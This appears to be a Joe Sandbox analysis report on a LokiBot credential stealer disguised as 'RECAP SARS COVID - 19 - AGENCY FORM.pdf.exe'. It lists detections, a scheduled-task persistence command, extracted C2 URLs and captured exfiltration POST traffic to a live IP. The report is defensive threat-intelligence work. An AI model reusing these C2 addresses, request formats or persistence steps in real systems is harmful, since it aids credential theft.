Windows Analysis Report RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe

Overview

General Information

Sample Name: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Analysis ID: 442954
MD5: ea646520496fd4603aaf0f5778231f0d
SHA1: 5112f3f6ae6a8a7cfac8364433128228c450f203
SHA256: a130cf9df18f1ae304826c98d4e7cfd2e75043b126a1df0c0a36f98a64cde5c2
Tags: exe, lokibot

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains method to dynamically call methods (often used by packers)
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe (PID: 5708 cmdline: 'C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe' MD5: EA646520496FD4603AAF0F5778231F0D)
    • schtasks.exe (PID: 5504 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/fn1ToJTMzu3Td"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security |
00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group |
  • 0x6ffe7:$des3: 68 03 66 00 00
  • 0x743e4:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x744b0:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security |
6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack | Loki_1 | Loki Payload | kevoreilly |
  • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x13ffc:$a2: last_compatible_version
6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group |
  • 0x12fff:$des3: 68 03 66 00 00
  • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

Sigma Overview

System Summary:

Sigma detected: Suspicious Double Extension
Source: Process started | Author: Florian Roth (rule), @blu3_team (idea) | Data: Command: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, CommandLine: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, CommandLine|base64offset|contains: HR, Image: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, NewProcessName: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, OriginalFileName: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, ParentCommandLine: 'C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe', ParentImage: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, ParentProcessId: 5708, ProcessCommandLine: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, ProcessId: 3704

Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp | Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/fn1ToJTMzu3Td"]}
Multi AV Scanner detection for domain / URL
Source: http://63.141.228.141/32.php/fn1ToJTMzu3Td | Virustotal: Detection: 11%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\qvDFOnW.exe | Virustotal: Detection: 34%
Source: C:\Users\user\AppData\Roaming\qvDFOnW.exe | ReversingLabs: Detection: 19%
Multi AV Scanner detection for submitted file
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Virustotal: Detection: 34%
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | ReversingLabs: Detection: 19%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\qvDFOnW.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Joe Sandbox ML: detected
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49715 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49715 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49715 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49715 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49717 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49717 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49717 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49717 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49719 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49719 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49719 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49719 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49720 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49720 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49720 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49720 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49721 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49721 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49721 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49721 -> 63.141.228.141:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor | URLs: http://63.141.228.141/32.php/fn1ToJTMzu3Td
Source: Joe Sandbox View | IP Address: 63.141.228.141
Source: Joe Sandbox View | ASN Name: NOCIXUS
Source: global traffic | HTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 63.141.228.141 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: FAC4DD3C | Content-Length: 190 | Connection: close
Source: global traffic | HTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 63.141.228.141 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: FAC4DD3C | Content-Length: 163 | Connection: close
Source: unknown | TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 6_2_00404ED4 recv
Source: unknown | HTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 63.141.228.141 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: FAC4DD3C | Content-Length: 190 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 01 Jul 2021 12:36:31 GMT | Server: Apache | Connection: close | Content-Type: text/html; charset=UTF-8
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.238593884.000000000302F000.00000004.00000001.sdmp | String found in binary or memory: http://63.141.228.141/32.php/fn1ToJTMzu3Td
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.238593884.000000000302F000.00000004.00000001.sdmp | String found in binary or memory: http://63.141.228.141/32.php/fn1ToJTMzu3Td?qM
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221764921.0000000000F67000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com8
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.combi
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comrsP
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.coms
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp | String found in binary or memory: https://apple.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221579092.0000000000B9B000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                System Summary:

                barindex
Malicious sample detected (through community Yara rule)
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_00B8E560
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_00B8E558
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_00B8BCB4
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF7770
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CFB198
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CFA2A8
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF1808
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF1807
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF1A5F
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF1A60
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 6_2_0040549C
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 6_2_004029D4
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: String function: 00405B6F appears 42 times
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qvDFOnW.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qvDFOnW.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qvDFOnW.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221579092.0000000000B9B000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.229005900.0000000007110000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSparselyPopulated.dll@ vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.228871654.0000000006E70000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.229926575.000000000EBB0000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.230426036.000000000ECA0000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.230426036.000000000ECA0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221241977.00000000003B6000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameInt16ArrayTypeInfo.exe: vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.229331155.0000000009270000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameRelativeFileUrl.dllL vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000000.220566722.0000000000886000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameInt16ArrayTypeInfo.exe: vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Binary or memory string: OriginalFilenameInt16ArrayTypeInfo.exe: vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
